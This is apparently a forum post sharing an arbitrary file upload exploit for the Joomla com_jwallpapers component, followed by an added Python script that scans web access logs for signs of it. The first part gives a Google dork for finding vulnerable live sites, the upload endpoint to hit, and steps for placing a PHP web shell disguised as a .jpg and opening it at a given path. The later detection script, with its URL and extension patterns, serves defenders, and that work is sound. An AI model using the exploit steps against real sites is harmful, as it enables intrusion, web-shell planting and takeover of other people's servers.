Hello guys, I am going to share the Joomla com_jwallpapers component arbitrary file upload vulnerability exploit.
Google Dork: inurl:/index.php?option=com_jwallpapers
Select one of the sites, then enter this exploit: /index.php?option=com_jwallpapers&task=upload
If it is vulnerable, you'll see something like: {"jsonrpc": "2.0", "result": null, "id": "en"}
CSRF Xploit Code:
click here and copy
NB: Replace shell_kalian.php with the name that you want for the shell (e.g. shell.php). The shell that you upload must have a .jpg extension (e.g. shell.jpg). There is no need to use Tamper Data and so on.
Shell Access:
http://target.com/jwallpapers_files/plupload/shell_kalian.php
Still remember that the shell must have a .jpg extension, and that you later change the name of your shell, e.g. kalian.php, to match what you wrote in the CSRF code; the extension is then .php.
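For defenders, both request patterns described in this post leave traces in web server access logs: requests to the component's upload task, and script files requested from the plupload upload directory. The following Python script is an added example, not part of the original post; the log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2013:10:01:02 +0000] "GET /index.php?option=com_jwallpapers&task=upload HTTP/1.1" 200 48 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:01:40 +0000] "POST /index.php?option=com_jwallpapers&task=upload HTTP/1.1" 200 48 "http://other.example/form.html" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:02:05 +0000] "GET /jwallpapers_files/plupload/shell_kalian.php HTTP/1.1" 200 913 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2013:10:03:00 +0000] "GET /index.php?option=com_jwallpapers&view=category HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2013:10:03:04 +0000] "GET /jwallpapers_files/plupload/beach.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

# ip, identd, user, [timestamp], "METHOD target PROTO", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Script-like extensions that should never be served from an upload directory.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)(?:$|/)', re.IGNORECASE)
UPLOAD_DIR = "/jwallpapers_files/plupload/"


def classify(line):
    """Return a finding dict for a suspicious log line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    url = urlsplit(target)
    path = unquote(url.path)  # decode %-escapes before matching
    qs = parse_qs(url.query)
    if qs.get("option") == ["com_jwallpapers"] and qs.get("task") == ["upload"]:
        # GET is the probe described in the post; POST is an upload attempt.
        kind = "upload-endpoint-" + ("post" if method == "POST" else "probe")
    elif UPLOAD_DIR in path.lower() and SCRIPT_EXT.search(path):
        kind = "script-in-upload-dir"
    else:
        return None
    return {"ip": ip, "time": ts, "kind": kind, "path": path, "status": int(status)}


def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `script-in-upload-dir` finding with status 200 means a script file was served from the upload directory, so that directory's contents should be reviewed.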